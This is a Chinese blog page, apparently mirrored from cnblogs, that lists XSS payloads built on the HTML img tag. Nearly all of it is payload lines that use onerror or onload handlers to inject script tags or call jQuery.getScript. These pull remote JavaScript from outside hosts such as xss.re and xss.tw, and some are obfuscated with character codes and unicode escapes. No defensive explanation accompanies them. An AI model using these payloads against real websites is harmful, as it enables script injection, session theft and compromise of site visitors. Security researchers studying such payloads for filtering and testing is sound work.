zoukankan      html  css  js  c++  java

  • Xss里img标签的一些利用

    <img src=x onerror=with(document)body.appendChild(document.createElement('script')).src="//xss.re/974"></img>
    “><img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’//xss.re/974’”></img>
    <img src=1 onerror=jQuery.getScript("//xss.re/974")> 
    <img src="#" onerror="$.getScript('u002fu002fxss.twu002f4091')">
    <img src="#" onerror="var a=String.fromCharCode(47);$.getScript(a+a+'xss.tw'+a+'4091')">
    <img src='0' onerror=with(document)body.appendChild(createElement('script')).src='/xx'>
    <img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" onload="s=document.createElement('script');s.src='http://xx'+Math.random();document.body.appendChild(s)" border="0">
    <img src=i onerror=eval(jQuery.getScript('//xss.tw/4091'))>
    <img src=N onerror=eval(javascript:document.write(unescape(' <script src="http://xxx.js"></script>'));)>
    <img src=x onerror=document.body.appendChild(document.createElement('script')).src='//xxx.xxx/a.js'>
    <img src=x onerror="with(document)body.appendChild(createElement('script')).src='http://xss.tw/4814'" width="0" height="0"></img>
  • 相关阅读:
    Guava的学习2
    Guava的学习1
    数据结构
    二叉搜索树的第k个结点
    滑动窗口的最大值
    僵尸进程和孤儿进程
    fork和vfork,exec
    扑克牌顺子
    字符流中第一个不重复的字符
    表示数值的字符串
  • 原文地址:https://www.cnblogs.com/hookjoy/p/3538487.html
Copyright © 2011-2022 走看看